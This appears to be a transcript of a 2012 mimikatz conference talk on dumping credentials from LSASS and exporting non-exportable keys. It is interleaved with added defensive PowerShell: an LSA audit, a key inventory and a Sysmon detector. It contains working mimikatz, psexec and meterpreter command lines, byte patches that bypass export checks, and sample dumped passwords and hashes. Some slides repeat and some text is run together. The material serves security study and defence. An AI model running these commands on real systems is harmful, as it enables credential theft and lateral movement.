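# Added example (not from the talk): read-only audit of LSASS credential-caching posture.
# Registry value names are documented Microsoft settings; thresholds are this example's choice.
function Get-LsaCredentialPosture {
    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # Returns $null when the value (or its key) does not exist: older OS or never configured.
    function Read-RegValue([string] $Path, [string] $Name) {
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
        catch { $null }
    }

    $findings = @()

    # 1. Which security packages LSASS loads. tspkg, wdigest and livessp are the ones the
    #    talk reads clear-text passwords from; kerberos and msv1_0 cannot realistically go.
    #    Windows 8+ keeps the effective list under Lsa\OSConfig, older systems under Lsa.
    $packages = @( @(Read-RegValue $lsa 'Security Packages') +
                   @(Read-RegValue "$lsa\OSConfig" 'Security Packages') |
                   Where-Object { $_ -and $_ -ne '""' } | Select-Object -Unique )
    foreach ($pkg in 'tspkg', 'wdigest', 'livessp') {
        if ($packages -contains $pkg) { $findings += "SSP '$pkg' is loaded by LSASS ('Security Packages')" }
    }

    # 2. WDigest clear-text caching switch (Windows 8.1+, KB2871997 on older systems). Absent = not hardened.
    $ulc = Read-RegValue $wdigest 'UseLogonCredential'
    if ($ulc -ne 0) { $findings += "WDigest\UseLogonCredential is not 0 (value: '$ulc')" }

    # 3. LSA protection: only protected processes may open LSASS for read/inject (Windows 8.1+).
    if ((Read-RegValue $lsa 'RunAsPPL') -ne 1) { $findings += 'Lsa\RunAsPPL is not 1 (LSASS is not a protected process)' }

    # 4. NTLM: level >= 3 sends NTLMv2 only; RestrictSendingNTLMTraffic = 2 denies all outgoing NTLM.
    $lmcl = Read-RegValue $lsa 'LmCompatibilityLevel'
    if ($null -eq $lmcl -or $lmcl -lt 3) { $findings += "Lsa\LmCompatibilityLevel is below 3 (value: '$lmcl')" }
    if ((Read-RegValue $msv 'RestrictSendingNTLMTraffic') -ne 2) { $findings += 'MSV1_0\RestrictSendingNTLMTraffic is not 2 (outgoing NTLM allowed)' }

    # 5. Debug privilege on the current token: the talk's first requirement for sekurlsa.
    $dbg = whoami /priv | Select-String 'SeDebugPrivilege'
    if ($dbg) { $findings += "Current token holds SeDebugPrivilege: $($dbg.Line.Trim())" }

    [pscustomobject]@{
        LoadedSecurityPackages = $packages
        Findings               = $findings
    }
}

Get-LsaCredentialPosture | Format-List
```

Run it elevated on the host you are assessing; every line under Findings maps back to one bullet of the slide (loaded providers, NTLM, debug privilege), and an empty list only means the registry side is closed, not that admin rights are under control.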
mimikatz :: crypto :: what is it
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;)
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
  (constraint for most users; unavailable for computer keys)
– Export/Archive flag not present
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported ( level)
[Diagram: inside the process, CryptoAPI and the RSA CSP load the private key (DPAPI decode); the application asks to export the key and the CSP checks the exportable flag: yes → exported key; no → NTE_BAD_KEY_STATE. "PLAYSKOOL" label on the CSP.]
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

[Callout on both outputs: Exportable]
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export
mimikatz :: crypto :: patchcapi :: limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
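An inventory that turns the "how it's protected" and "limitations" slides above into a per-host risk list, added as an example (not mimikatz code and not from the talk): for each certificate with a private key it reports whether the key is held by a CAPI CSP or a CNG KSP, which provider holds it, whether the export flag is set, and whether the provider is one of the five rsaenh.dll-based CSPs listed above or the Microsoft Software Key Storage Provider, that is, a software key whose export flag an admin can get around on this host. Keys on smart cards, HSMs or a TPM KSP show up under another provider name. The .NET calls are standard ones (RSACertificateExtensions.GetRSAPrivateKey needs .NET 4.6 or later); which class comes back for a CAPI key differs between .NET Framework and .NET Core, so both paths are handled and that split is an assumption of this example.

```powershell
# Added example (not from the talk, not mimikatz code): inventory of private keys per
# provider and export flag. Run it as the user whose store you audit; LocalMachine needs admin.
function Get-PrivateKeyInventory {
    param([string[]] $Stores = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    # The five CAPI CSPs the talk lists as rsaenh.dll-based, plus the software KSP it patches in LSASS.
    $rsaenhCsps = @(
        'Microsoft Base Cryptographic Provider v1.0',
        'Microsoft Enhanced Cryptographic Provider v1.0',
        'Microsoft Enhanced RSA and AES Cryptographic Provider',
        'Microsoft RSA SChannel Cryptographic Provider',
        'Microsoft Strong Cryptographic Provider'
    )
    $softwareKsp = 'Microsoft Software Key Storage Provider'

    foreach ($store in $Stores) {
        $certs = Get-ChildItem -Path $store -ErrorAction SilentlyContinue | Where-Object { $_.HasPrivateKey }
        foreach ($cert in $certs) {
            $api = 'unknown'; $provider = $null; $container = $null; $exportable = $null
            try {
                # Legacy property: an RSACryptoServiceProvider only for CAPI keys
                # (for CNG keys it is $null or throws, depending on the runtime).
                $capi = $null
                try { $capi = $cert.PrivateKey } catch { }
                if ($capi -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    $info       = $capi.CspKeyContainerInfo
                    $api        = 'CAPI'
                    $provider   = $info.ProviderName
                    $container  = $info.KeyContainerName
                    $exportable = $info.Exportable
                } else {
                    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                    if ($rsa -is [System.Security.Cryptography.RSACng]) {
                        $key        = $rsa.Key
                        $api        = 'CNG'
                        $provider   = $key.Provider.Provider
                        $container  = $key.KeyName
                        $policy     = [int]$key.ExportPolicy
                        $exportable = ($policy -band [int][System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0
                    }
                }
            } catch { }   # smart card absent, access denied, non-RSA key: stays 'unknown'

            # Software-held key: the flag alone does not stop an admin on this host.
            $software = ($rsaenhCsps -contains $provider) -or ($provider -eq $softwareKsp)

            [pscustomobject]@{
                Store       = $store
                Subject     = $cert.Subject
                Thumbprint  = $cert.Thumbprint
                KeyApi      = $api
                Provider    = $provider
                Container   = $container
                ExportFlag  = $exportable
                SoftwareKey = $software
                NotAfter    = $cert.NotAfter
            }
        }
    }
}

# Keys worth moving to a smart card, token or HSM first: software-held, whatever their flag says.
Get-PrivateKeyInventory | Where-Object { $_.SoftwareKey } |
    Format-Table Store, Subject, KeyApi, Provider, ExportFlag -AutoSize
```

The ExportFlag column is what certutil and the MMC honour; the SoftwareKey column is what matters for the attacker model of this talk, since a non-exportable flag on a software key only constrains well-behaved callers.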
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key Isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
[Diagram: the process calls CNG, which goes over RPC to the KeyIso Service in the LSASS process. There the private key is loaded (DPAPI decode), the export is asked for and the exportable flag is checked: yes → exported key back to the process; no → NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP. "PLAYSKOOL" label on the KSP.]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso)!ncrypt!SPCryptExportKey
This function does all the work to prepare the export, and checks if the key is exportable

mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

[Callout on the output: Exportable]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu ?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog     http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source   https://code.google.com/p/mimikatz
email    benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: kerberos "hu ?"
Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)
From my understanding of Microsoft explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
  • password hash for shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" LSASS initialized keys
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
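A detection-side counterpart to the slide above, added as an example that is not part of the talk: whatever reads LSASS memory must first open the process with PROCESS_VM_READ, and the older injection route additionally needs PROCESS_VM_WRITE and PROCESS_CREATE_THREAD; Sysmon records such handle requests as event 10 (ProcessAccess). The function below applies that rule to records carrying Sysmon's field names (SourceImage, TargetImage, GrantedAccess, UtcTime). The sample records are constructed for this example, not captured from a host, and the allow-list of legitimate source images is a placeholder to tune per environment.

```powershell
# Added example (not from the talk): flag handles to lsass.exe strong enough to read its memory
# or to inject into it, using Sysmon event 10 (ProcessAccess) field names.
# Standard Windows process access rights (winnt.h values):
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_READ       = 0x0010
$PROCESS_VM_WRITE      = 0x0020

function Test-LsassAccess {
    param(
        [Parameter(Mandatory)] [hashtable] $Record,
        # Placeholder allow-list: processes expected to hold such handles on this platform.
        [string[]] $AllowedSources = @('C:\Windows\System32\csrss.exe',
                                      'C:\Windows\System32\wininit.exe')
    )
    if ($Record.TargetImage -notmatch '\\lsass\.exe$') { return $null }

    $mask    = [int]$Record.GrantedAccess
    $reasons = @()
    # "just reading memory of the LSASS process": PROCESS_VM_READ is enough for that.
    if ($mask -band $PROCESS_VM_READ) { $reasons += 'PROCESS_VM_READ (memory read)' }
    # The injection route (a DLL dropped into LSASS) needs write plus thread creation.
    if (($mask -band $PROCESS_VM_WRITE) -and ($mask -band $PROCESS_CREATE_THREAD)) {
        $reasons += 'PROCESS_VM_WRITE + PROCESS_CREATE_THREAD (injection)'
    }
    if ($reasons.Count -eq 0) { return $null }
    if ($AllowedSources -contains $Record.SourceImage) { return $null }

    [pscustomobject]@{
        UtcTime       = $Record.UtcTime
        SourceImage   = $Record.SourceImage
        GrantedAccess = '0x{0:X}' -f $mask
        Reasons       = $reasons -join '; '
    }
}

# Constructed sample records (not real telemetry).
$samples = @(
    @{ UtcTime = '2012-11-07 10:00:01'; SourceImage = 'C:\Windows\System32\csrss.exe';
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = 0x1FFFFF },   # allow-listed
    @{ UtcTime = '2012-11-07 10:02:13'; SourceImage = 'C:\Users\demo\Desktop\tool.exe';
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = 0x1010 },     # VM_READ + QUERY_INFORMATION
    @{ UtcTime = '2012-11-07 10:02:14'; SourceImage = 'C:\Users\demo\Desktop\tool.exe';
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = 0x1000 },     # QUERY_LIMITED_INFORMATION only
    @{ UtcTime = '2012-11-07 10:05:00'; SourceImage = 'C:\Windows\System32\svchost.exe';
       TargetImage = 'C:\Windows\System32\notepad.exe'; GrantedAccess = 0x1010 }    # not LSASS
)

# Only the second record is reported: an unlisted binary holding PROCESS_VM_READ on lsass.exe.
$samples | ForEach-Object { Test-LsassAccess -Record $_ } | Where-Object { $_ } | Format-List
```

On a live host the same function can be fed from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log (Id 10) after mapping the event's data fields into a hashtable; the access-mask logic does not change.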
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
[Diagram (label: LsaUnprotectMemory): in the lsass process, lsasrv.dll holds the key material g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz loads its own lsasrv.dll and copies… these values from LSASS into it.]
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
[Diagram: in the lsass process, lsasrv.dll holds InitializationVector (BYTE[16]), h3DesKey and hAesKey, handles to the BCrypt key objects described below; mimikatz copies… them from LSASS into its own lsasrv.dll.]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size; DWORD tag; DWORD type;
    DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3;
    PVOID unk4;
    BYTE  data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
typedef struct _KIWI_BCRYPT_KEY {
    DWORD size; DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package         Symbols                                                  Type
tspkg           tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                                    LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList, lsasrv!LogonSessionListCount    LIST_ENTRY, ULONG
Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback
Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands
mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless :))
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys :))
– Leave opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 37
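Two items of that checklist can be verified locally. The PowerShell below is an added example, not code from the talk or from mimikatz: it lists the security packages LSA loads (flagging the three the slide says can be removed) and resolves who holds SeDebugPrivilege, the right that privilege::debug needs. The registry paths, the secedit export and the temporary file name are my assumptions about an elevated Windows PowerShell 5.1 host.

```powershell
# Added example (not from the slides): audit two of the preconditions the
# talk relies on. Run in an elevated Windows PowerShell 5.1 session.
#   1. Which security packages LSA loads. Per the slide, LiveSSP, TsPkg and
#      WDigest can be removed; Kerberos and msv1_0 cannot.
#   2. Who holds SeDebugPrivilege, the right needed before LSASS memory can
#      be read by a user-mode tool.

function Get-LsaSecurityPackages {
    # Both values are REG_MULTI_SZ; Windows 8 keeps the default list in OSConfig.
    $paths = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    )
    $removable = @('tspkg', 'wdigest', 'livessp')   # the three named on the slide
    $seen = @{}
    foreach ($p in $paths) {
        $item = Get-ItemProperty -Path $p -ErrorAction SilentlyContinue
        $list = @($item.'Security Packages') | Where-Object { $_ }
        foreach ($pkg in $list) {
            # An empty default is stored as the literal string "" on some builds.
            $name = $pkg.Trim('"').ToLower()
            if (-not $name -or $seen.ContainsKey($name)) { continue }
            $seen[$name] = $true
            [pscustomobject]@{
                Package   = $name
                Source    = $p
                Removable = ($removable -contains $name)
            }
        }
    }
}

function Get-DebugPrivilegeHolders {
    # secedit writes the local policy as a UTF-16 INI file; [Privilege Rights]
    # maps each right to a comma-separated list of *SIDs (or bare names).
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    $null = secedit /export /cfg $cfg /areas USER_RIGHTS /quiet
    if (-not (Test-Path -Path $cfg)) { throw 'secedit export failed (not elevated?)' }
    try {
        $value = ''
        foreach ($line in Get-Content -Path $cfg) {
            if ($line -match '^SeDebugPrivilege\s*=\s*(.*)$') { $value = $Matches[1]; break }
        }
    } finally {
        Remove-Item -Path $cfg -Force -ErrorAction SilentlyContinue
    }
    $entries = $value -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
    foreach ($entry in $entries) {
        $account = $entry
        if ($entry.StartsWith('*S-1-')) {
            try {
                $sid = New-Object -TypeName System.Security.Principal.SecurityIdentifier `
                                  -ArgumentList $entry.TrimStart('*')
                $account = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { }   # unresolvable SID (deleted account): keep the raw value
        }
        [pscustomobject]@{ Entry = $entry; Account = $account }
    }
}

Write-Host '== LSA security packages (Removable = the slide says this one can go) =='
Get-LsaSecurityPackages | Format-Table -AutoSize | Out-Host
Write-Host '== SeDebugPrivilege holders (Administrators only, or fewer) =='
Get-DebugPrivilegeHolders | Format-Table -AutoSize | Out-Host
```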
mimikatz crypto – what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 38
mod_mimikatz_crypto
mimikatz crypto – how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or password of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 39
Constraint for most users
Unavailable for computer keys
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi – how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 40
mimikatz crypto capi – how it's exported? ( level)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 41
[Diagram: the process calls CryptoAPI and the RSA CSP ("Ask to export Key"); the CSP DPAPI-decodes the private key file ("PLAYSKOOL"), loads the private key and checks "Exportable?": yes → exported key; no → NTE_BAD_KEY_STATE]
mimikatz crypto::patchcapi – because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 42
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
